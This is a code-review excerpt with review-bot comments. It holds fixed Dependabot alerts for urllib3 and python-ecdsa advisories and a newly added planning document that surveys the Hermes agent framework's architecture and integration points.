[OSTIF](https://ostif.org/).","severity":"high","identifiers":[{"value":"GHSA-2xpw-w6gg-jr37","type":"GHSA"},{"value":"CVE-2025-66471","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37"},{"url":"https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66471"},{"url":"https://github.com/advisories/GHSA-2xpw-w6gg-jr37"}],"published_at":"2025-12-05T18:15:54Z","updated_at":"2025-12-05T18:33:09Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.0, < 
2.6.0","first_patched_version":{"identifier":"2.6.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00014,"percentile":0.02784},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.0, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/3","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/3","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":2,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-gm62-xv2j-4w53","cve_id":"CVE-2025-66418","summary":"urllib3 allows an unbounded number of links in the decompression chain","description":"## Impact\n\nurllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).\n\nHowever, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data.\n\n\n## Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly.\n\n\n## Remediation\n\nUpgrade 
to at least urllib3 v2.6.0 in which the library limits the number of links to 5.\n\nIf upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers[\"content-encoding\"]` contains a safe number of encodings before reading the response content.","severity":"high","identifiers":[{"value":"GHSA-gm62-xv2j-4w53","type":"GHSA"},{"value":"CVE-2025-66418","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53"},{"url":"https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66418"},{"url":"https://github.com/advisories/GHSA-gm62-xv2j-4w53"}],"published_at":"2025-12-05T18:15:19Z","updated_at":"2025-12-05T18:33:00Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.24, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00016,"percentile":0.03574},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.24, < 
2.6.0","first_patched_version":{"identifier":"2.6.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/2","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/2","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null},{"number":1,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ecdsa"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-wj6h-64fc-37mp","cve_id":"CVE-2024-23342","summary":"Minerva timing attack on P-256 in python-ecdsa","description":"python-ecdsa has been found to be subject to a Minerva timing attack on the P-256 curve. Using the `ecdsa.SigningKey.sign_digest()` API function and timing signatures an attacker can leak the internal nonce which may allow for private key discovery. Both ECDSA signatures, key generation, and ECDH operations are affected. ECDSA signature verification is unaffected. 
The python-ecdsa project considers side channel attacks out of scope for the project and there is no planned fix.","severity":"high","identifiers":[{"value":"GHSA-wj6h-64fc-37mp","type":"GHSA"},{"value":"CVE-2024-23342","type":"CVE"}],"references":[{"url":"https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-wj6h-64fc-37mp"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/blob/master/SECURITY.md"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23342"},{"url":"https://minerva.crocs.fi.muni.cz"},{"url":"https://securitypitfalls.wordpress.com/2018/08/03/constant-time-compare-in-python"},{"url":"https://github.com/advisories/GHSA-wj6h-64fc-37mp"}],"published_at":"2024-01-22T21:35:27Z","updated_at":"2025-07-30T18:17:41Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"high","vulnerable_version_range":">= 0","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","score":7.4},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00622,"percentile":0.69689},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","score":7.4},"cwes":[{"cwe_id":"CWE-203","name":"Observable Discrepancy"},{"cwe_id":"CWE-208","name":"Observable Timing Discrepancy"},{"cwe_id":"CWE-385","name":"Covert Timing Channel"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"high","vulnerable_version_range":">= 0","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/1","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/1","created_at":"2026-04-30T08:37:30Z","updated_at":"2026-05-13T05:27:05Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:05Z","auto_dismissed_at":null}] \ No newline at end of file 
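Review bot: The alert objects in this file embed far more than a planning record needs and will go stale as soon as alert state changes: each `security_advisory.description` carries the full advisory markdown as an escaped string (the filelock entry includes the complete attack walkthrough), next to API bookkeeping such as `dismissal_request`, `assignees` and `auto_dismissed_at`, and the file ends without a newline. Suggest committing a reduced, pretty-printed record per alert (`number`, package name, `manifest_path`, `ghsa_id`, `cve_id`, `severity`, `state`, `first_patched_version`, `fixed_at`) together with the fetch date, and leaving the descriptions to be looked up by GHSA id. Separately, alert 1 (ecdsa) is recorded as `"state":"fixed"` while its advisory has `"vulnerable_version_range":">= 0"` and `"first_patched_version":null`, so no version upgrade can have closed it; please record how it was resolved (for example, whether the package dropped out of `methods/evermemos/uv.lock`), since the advisory text itself says there is no planned fix.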
diff --git a/.planning/hermes-recon/architecture.md b/.planning/hermes-recon/architecture.md new file mode 100644 index 00000000..0d1482f1 --- /dev/null +++ b/.planning/hermes-recon/architecture.md 
@@ -0,0 +1,207 @@ +# Hermes Agent Architecture Recon + +**Source**: `NousResearch/hermes-agent` (147k ★, MIT) +**Clone**: `/tmp/hermes-recon` (depth=1, 2026-05-13T06:58Z) +**Version**: HEAD as of 2026-05-13 +**Repo size**: ~100MB (shallow clone) + +## Architecture Overview + +Hermes is a Python agent framework with a plugin system, tool registry, +multi-provider model backend, and 20+ messaging platform adapters. The +core agent loop (`run_agent.py`) is ~12K lines; the CLI (`cli.py`) is +~615K lines. Total Python surface is massive — a full Rust rewrite of +the runtime (per 邓Sir's plan) is a major undertaking. + +``` +┌─────────────────────────────────────────────┐ +│ Entry Points │ +│ cli.py (TUI) run_agent.py (headless) │ +│ batch_runner.py rl_cli.py mcp_serve.py │ +├─────────────────────────────────────────────┤ +│ Core Agent Loop │ +│ AIAgent class (run_agent.py, ~12K LOC) │ +│ - Prompt construction │ +│ - Model provider dispatch │ +│ - Tool call parsing + execution │ +│ - Compression (trajectory_compressor.py) │ +├─────────────────────────────────────────────┤ +│ Tool System │ +│ tools/registry.py → ToolEntry │ +│ model_tools.py → handle_function_call() │ +│ 80+ tool files auto-discovered │ +├──────────────┬──────────────────────────────┤ +│ Plugins │ Environments │ +│ memory (8) │ local, docker, ssh, │ +│ models (6+) │ modal, daytona, │ +│ context_eng │ singularity │ +│ kanban │ │ +│ observability│ │ +└──────────────┴──────────────────────────────┘ +``` + +## Key Components + +### 1. Tool Dispatch Interface + +**File**: `tools/registry.py:ToolEntry` + +```python +class ToolEntry: + __slots__ = ( + "name", "toolset", "schema", "handler", "check_fn", + "requires_env", "is_async", "description", "emoji", + "max_result_size_chars", "dynamic_schema_overrides", + ) +``` + +Tool files call `registry.register()` at module level. `discover_builtin_tools()` +uses AST parsing to find modules with register calls, then imports them lazily. 
+This is a **self-registering pattern** — no central tool list, no manual sync. + +Evercore integration seam: The registry is the natural injection point. An +Evercore tool adapter would register tools that proxy through Evercore's API +layer instead of calling local handler functions. + +### 2. Memory Abstraction + +**File**: `plugins/memory/__init__.py` + +Memory providers implement a `MemoryProvider` ABC. Eight implementations ship: + +| Provider | File | Description | +|----------|------|-------------| +| honcho | `plugins/memory/honcho/` | Conversation memory | +| mem0 | `plugins/memory/mem0/` | mem0ai integration | +| supermemory | `plugins/memory/supermemory/` | Supermemory vector DB | +| retaindb | `plugins/memory/retaindb/` | RetainDB | +| openviking | `plugins/memory/openviking/` | OpenViking | +| byterover | `plugins/memory/byterover/` | ByteRover | +| hindsight | `plugins/memory/hindsight/` | Hindsight | +| holographic | `plugins/memory/holographic/` | Holographic memory | + +Only ONE provider active at a time, selected via `config.yaml` → `memory.provider`. +Providers are discovered by scanning for `register_memory_provider` or +`MemoryProvider` in `__init__.py` source. + +**Evercore integration seam**: Replace the MemoryProvider ABC with an Evercore +adapter. The adapter would use the same config-driven selection (`memory.provider: evercore`) +but route all memory operations through EverCore's REST API (or direct import). +This is 邓Sir's "abstract Memory" suggestion — keep the Hermes memory plugin +interface but swap the backend. + +### 3. MCP Integration + +**File**: `mcp_serve.py` (~32K LOC) + +Hermes can run as an MCP server, exposing its tools to MCP clients (Claude +Desktop, VS Code, etc.). The MCP server wraps Hermes's tool registry and +exposes tool definitions via the MCP protocol. 
+ +**Evercore integration seam**: EverCore could register as an MCP client that +consumes Hermes's tool definitions, or Hermes's MCP server could be extended +to proxy tools through Evercore's memory layer before execution. + +### 4. Sandbox Model + +**File**: `environments/` + +Hermes supports multiple execution backends for tool sandboxing: + +| Environment | Status | Description | +|-------------|--------|-------------| +| local | Default | Direct host execution (no sandbox) | +| docker | Active | Containerized execution | +| ssh | Active | Remote execution via SSH | +| modal | Active | Modal.com serverless | +| daytona | Active | Daytona dev environments | +| singularity | Active | HPC containers | + +**Evercore integration seam**: The Rust runtime would need to implement at +least the local + docker backends. Tauri/Burn/tokio are the prior-art +references for sandbox primitives in Rust. + +### 5. Plugin System + +**File**: `plugins/` + +Plugin categories and count: +- `memory/` (8 providers) — memory backends +- `model-providers/` (6+) — inference backends (openrouter, anthropic, gmi, etc.) +- `context_engine/` — context augmentation +- `kanban/` — multi-agent board dispatcher +- `observability/` — metrics/traces/logs +- `image_gen/` — image generation providers +- `platforms/` — messaging platform adapters (in `gateway/platforms/`) + +Plugins are discovered via filesystem scanning. User-installed plugins live +in `$HERMES_HOME/plugins/`. Bundled plugins take precedence on name collisions. + +### 6. Session Store + +**File**: `hermes_state.py` (~127K LOC) + +SQLite-based session database with FTS5 full-text search. Stores conversation +history, tool call results, and agent state. Schema includes `sessions`, +`messages`, `tool_calls`, `tool_results`, `memories` tables. + +**Evercore integration seam**: Replace the SQLite session store with EverCore's +tenant-scoped memory storage. 
Sessions become EverCore tenants; messages and +tool results become memory entries. + +## Integration Seams Summary + +| Seam | Hermes Component | Evercore Counterpart | Effort | +|------|-----------------|---------------------|--------| +| Memory backend | `plugins/memory/` ABC | EverCore memory_manager.py | Medium | +| Session store | `hermes_state.py` SQLite | EverCore tenant storage | High | +| Tool registry | `tools/registry.py` | EverCore API tool adapter | Low | +| Context engine | `plugins/context_engine/` | EverCore context retrieval | Medium | +| Plugin discovery | Filesystem scan | Config-driven plugin loading | Low | +| Environment sandbox | `environments/` backends | Rust sandbox (tokio/Tauri) | High | + +## Fork Strategy + +Per the May plan (project_evermind_2026_05 memory): +1. **Fork Hermes** (MIT license, no legal barrier) +2. **Rust rewrite of runtime** — environments, sandbox, plugin loader, CLI +3. **Evercore kernel integration** — memory backend, session store, context engine +4. **Keep Hermes GUI plugin** — the TUI/web interface stays as Hermes's + presentation layer +5. 
**EverMem Bench + Evil Agent Bench** — benchmark narrative for the fork + +## Prior Art for Rust Runtime + +Per the May plan proposal: +- **Tauri** — desktop app shell (Hermes Desktop replacement) +- **Burn** — ML framework (model provider integration) +- **tokio** — async runtime (agent loop, tool dispatch) +- **candle** — inference (optional, for local model support) + +## Key Metrics + +- ~12K LOC core agent loop (`run_agent.py`) +- ~615K LOC CLI (`cli.py`) — primarily UI code, not runtime +- 80+ tool modules in `tools/` +- 8 memory provider implementations +- 20+ messaging platform adapters +- ~17K tests across ~900 files + +## Files Referenced + +- `/tmp/hermes-recon/AGENTS.md` — project structure guide +- `/tmp/hermes-recon/tools/registry.py` — ToolEntry definition, `discover_builtin_tools()` +- `/tmp/hermes-recon/plugins/memory/__init__.py` — MemoryProvider ABC, provider discovery +- `/tmp/hermes-recon/mcp_serve.py` — MCP server (~32K LOC) +- `/tmp/hermes-recon/environments/` — sandbox backends +- `/tmp/hermes-recon/hermes_state.py` — SQLite session store +- `/tmp/hermes-recon/run_agent.py` — AIAgent class (~12K LOC) +- `/tmp/hermes-recon/model_tools.py` — tool orchestration + +## References in Existing Codebase + +- `methods/EverCore/src/agentic_layer/memory_manager.py` — core memory manager +- `methods/EverCore/src/infra_layer/adapters/input/api/` — REST API controllers +- `methods/EverCore/docs/` — setup, usage, architecture docs +- `benchmarks/EverMemBench/` — memory quality evaluation +- `benchmarks/EvoAgentBench/` — agent self-evolution evaluation
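Review bot: In section 4 (Sandbox Model), the seam note names "Tauri/Burn/tokio" as "prior-art references for sandbox primitives in Rust", but the "Prior Art for Rust Runtime" section of this same file describes them as a desktop app shell, an ML framework and an async runtime, so none of them is presented as an isolation mechanism. The same table lists `local` as the default with "Direct host execution (no sandbox)", and the seam commits the Rust runtime to "at least the local + docker backends". Please state which isolation mechanism the Rust runtime will actually rely on, and whether unsandboxed `local` remains the default in the fork. The plugin section has a related gap: plugins and memory providers are found by filesystem scanning, including the user-writable `$HERMES_HOME/plugins/`, and the summary table proposes "Config-driven plugin loading" without saying what the loader will trust, so a sentence on the intended trust model would help. Smaller points: Fork Strategy says "Evil Agent Bench" while the references list `benchmarks/EvoAgentBench/`. The "Files Referenced" entries point at `/tmp/hermes-recon/`, which no other reader can resolve, so an upstream repository and commit would make the recon reproducible. Figures such as "~615K LOC" for `cli.py` and "~127K LOC" for `hermes_state.py` look large for single files next to a "~12K LOC" core loop and are worth re-checking as line counts versus byte sizes.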